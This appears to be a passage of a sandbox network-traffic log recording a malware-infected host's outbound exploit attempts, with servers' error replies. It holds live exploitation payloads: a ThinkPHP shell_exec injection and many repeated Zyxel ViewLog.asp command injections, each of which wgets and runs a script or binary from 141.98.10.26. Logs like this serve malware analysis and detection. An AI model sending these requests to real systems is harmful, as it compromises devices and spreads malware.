Nov 22, 2023 08:39:36.617944956 CET	12986	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:36.829433918 CET	12992	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:36 GMT Date: Wed, 22 Nov 2023 07:39:36 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 37 38 31 30 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 37 36 26 23 34 36 3b 32 63 38 64 64 34 36 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d781002.1700638776.2c8dd46e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
649	192.168.2.23	35642	88.88.233.108	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:36.812077999 CET	12992	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
650	192.168.2.23	47120	85.214.173.199	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:37.868123055 CET	13108	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:38.066426039 CET	13129	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:37 GMT Server: Apache/2.4.56 (Debian) Content-Length: 304 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
651	192.168.2.23	45772	94.123.190.224	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.087439060 CET	13130	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
652	192.168.2.23	42330	94.122.25.214	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.094419003 CET	13130	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
653	192.168.2.23	59972	95.86.105.181	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.100271940 CET	13131	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
654	192.168.2.23	59046	95.86.108.16	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.100557089 CET	13131	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
655	192.168.2.23	47560	31.47.61.101	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.186177015 CET	13132	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:38.462493896 CET	13220	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:37:04 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
656	192.168.2.23	34826	85.255.165.228	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.682384014 CET	13228	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:38.908328056 CET	13233	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 22 Nov 2023 07:39:38 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
657	192.168.2.23	39096	62.249.140.218	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.775958061 CET	13230	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:39.091212034 CET	13257	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:40 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
658	192.168.2.23	60920	31.136.185.164	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.865705967 CET	13230	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:39.428550959 CET	13301	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:40.548500061 CET	13417	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:42.852108955 CET	13654	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:47.459440947 CET	14296	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.418198109 CET	15304	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:15.103622913 CET	17593	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:51.962573051 CET	19773	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
659	192.168.2.23	44510	85.209.139.174	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:38.898150921 CET	13231	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:39.114139080 CET	13259	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:15:52 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 